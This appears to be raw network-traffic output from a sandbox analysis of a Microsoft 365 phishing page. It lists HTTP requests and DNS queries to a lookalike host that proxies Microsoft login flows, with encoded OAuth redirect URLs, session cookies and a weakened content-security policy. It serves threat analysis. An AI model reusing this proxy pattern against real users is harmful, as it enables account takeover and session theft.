Source: global traffic	HTTP traffic detected: GET /?qrc=test%40test.org HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs
Source: global traffic	HTTP traffic detected: GET /?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg
Source: global traffic	HTTP traffic detected: GET /owa/?login_hint=test%40test.org HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1Host: portal365verf02.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf&sso_reload=true HTTP/1.1Host: portal365verf02.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoO
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: portal365verf02.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXTHlVdHJtV0lERFE4WVdITjFJem9qRmVPdGRkTWFMRUZidVlCbzFXMUhmS19pdDRqcVY1ak9qSU9TUXFaaXFHVmotemd4QTdPN2NPUTlBOE9Eam1KYThRdDRzSU9YZ18wTmlFLVBmazVPWG9hMkxUeFAyN01YeWNPQjl4UnRXN2s2MWlvS0FzMXE0dDd6NGRpS3B3U205SGFvckdTc2lJU0xIRWRWRTFrY3BNLVA3dEZnUzJLMnFjY2c2U1RvTWxna2oyandEY0tQTDFDN0R2LU5lclJWYkE3REk2SC1TRktiaFExdlRrLXNVNXI1UUpHZGNXZ19ldDBWMjhXWkxudjJzVkdTMm5TX2tkMDd3VDllR05qNDJDRXVCZzllUG5tMmVYZWg2X1I4N0g3S2RVb3I4SjdjQzYxTE15Mk9zRndmbEhDM2xrelVWYmpZVk9manVWUnNxNG5wck9sM09TdWt6aHhFcjhBMCZsb2dpbl9oaW50PXRlc3QlNDB0ZXN0Lm9yZyZlc3RzZmVkPTEmdWFpZD1jOWQ4YWRmYjQ5OGI5YzcwZWM0YjI1Mjg0ZWRlZTY5MSZjb2JyYW5kaWQ9ZGViM2Y3NGEtZWQ1Yi00ZWYxLThkM2MtOTJiODVkZDQ3MzUyJmZjaT0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAj HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTN

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 52f1897b.5648702dd4d5255cab645104.workers.dev
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: en-repooficeairfix.icu
Source: global traffic	DNS traffic detected: DNS query: portal365verf02.top
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: fpt.live.com

Source: unknown

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3323sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OXsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: dd1019f9-610c-4516-9cb0-8835e69c1601x-ms-ests-server: 2.1.19870.3 - FRC ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-5bCkSEUumt5FtbCF6JYxJA' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Wed, 15 Jan 2025 19:06:17 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 0a26b5f8-4c98-463e-a974-fb0a223b2b00x-ms-ests-server: 2.1.19870.3 - FRC ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-hyhpolFflHrUid46NPAlBg' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Wed, 15 Jan 2025 19:06:19 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: 